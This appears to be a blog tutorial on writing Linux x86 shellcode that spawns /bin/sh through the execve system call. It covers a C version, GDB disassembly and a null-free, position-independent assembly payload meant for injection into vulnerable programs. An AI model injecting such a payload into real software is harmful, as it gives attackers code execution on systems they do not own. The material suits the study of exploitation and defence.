Home > Linux, security > Shellcode : Spawning a Shell

Shellcode : Spawning a Shell

The easiest way to be able to write a shell code is to follow these steps:

1- Write your shellcode in high- level programming language and compile it.

2- Use any debugger you want to disassemble the compiled code (GDB).

3- Try to understand how the code works

4- Try to make the assembly simple and simple again.

5- Use objdump utility to generate opcodes(machine instructions in readable formate).

So, let’s try to begin write our shellcode in c language, the comments i wrote ‘ll be helpful to make life easier.

int main(void){
char *array[2];

array[0] = “/bin/sh”;
array[1] = ”;
/*
* execve syscall takes three arguments:

*  – Pointer to the executable file name
*  – Pointer to array of arguments
*  – Pointer to array of (form key=value)
* */

execve(array[0], array, 0);

return 0;
}

After we wrote the shellcode in high-level language, compile it, then we should use GDB to disassemble the compiled code to understand what’s going on.

0x080483c4 <main+0>:    push   %ebp
0x080483c5 <main+1>:    mov    %esp,%ebp
0x080483c7 <main+3>:    and    $0xfffffff0,%esp
0x080483ca <main+6>:    sub    $0x20,%esp
0x080483cd <main+9>:    movl   $0x80484c0,0x18(%esp)
0x080483d5 <main+17>:    movl   $0x0,0x1c(%esp)
0x080483dd <main+25>:    mov    0x18(%esp),%eax
0x080483e1 <main+29>:    movl   $0x0,0x8(%esp)
0x080483e9 <main+37>:    lea    0x18(%esp),%edx
0x080483ed <main+41>:    mov    %edx,0x4(%esp)
0x080483f1 <main+45>:    mov    %eax,(%esp)
0x080483f4 <main+48>:    call   0x80482fc <execve@plt>
0x080483f9 <main+53>:    mov    $0x0,%eax
0x080483fe <main+58>:    leave
0x080483ff <main+59>:    ret

I wont explain this output, it’s very easy to understand, so i ‘ll let you try to understand it, but we must know, that if we want to write a flexible shellcode (based on relative addressing not hardcoded one) we should use a register the represent the base register to us (in our shellcode ‘ll be ESI), and then uses offsets from it, so let’s see the scenario ……

This image explains every thing i ‘ll speak shortly (1 image = 1000 words), so let’s take a look at our shellcode that written to be flexible and injectable.

.text
.global _start
_start:

jmp MyCall
shellcode:

popl %esi               # ESI points to our target string
xorl %eax, %eax         # EAX filed with Nulls
movb %al, 0x7(%esi)     # Terminates our target string with null
movl %esi, 0x8(%esi)    # Move the address of our target string to argv
movl %eax, 0xc(%esi)    # Move set of nulls to envp

movb $11, %al           # Move syscall’s number 11 to the first 8  bits of EAX
movl %esi, %ebx
leal 0x8(%esi), %ecx
leal 0xc(%esi), %edx
int $0x80

MyCall:
call shellcode
MyTarget:
.ascii “/bin/shABBBBCCCC”

as shown in the previous shellcode, i had added comments to to help you to understand the steps we did, but i ‘ll list the steps also:

1- Fill EAX with nulle (by using xorl instruction)

2- Terminate the string “/bin/sh” with null by moving 8 bits of null from EXA to the ‘A’

place holder.

3- Copy the address of the string from ESI to EBX.

4- Copy the value of EAX over ‘BBBB’ place holders.

and so on, so here we seen the basic concepts to write an flexible and injectable (Not contains null values to be able to injected), so i advice you to try and try and write your own shellcodes to be a great shellcoder.

Advertisements
Categories: Linux, security Tags: , , , ,
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: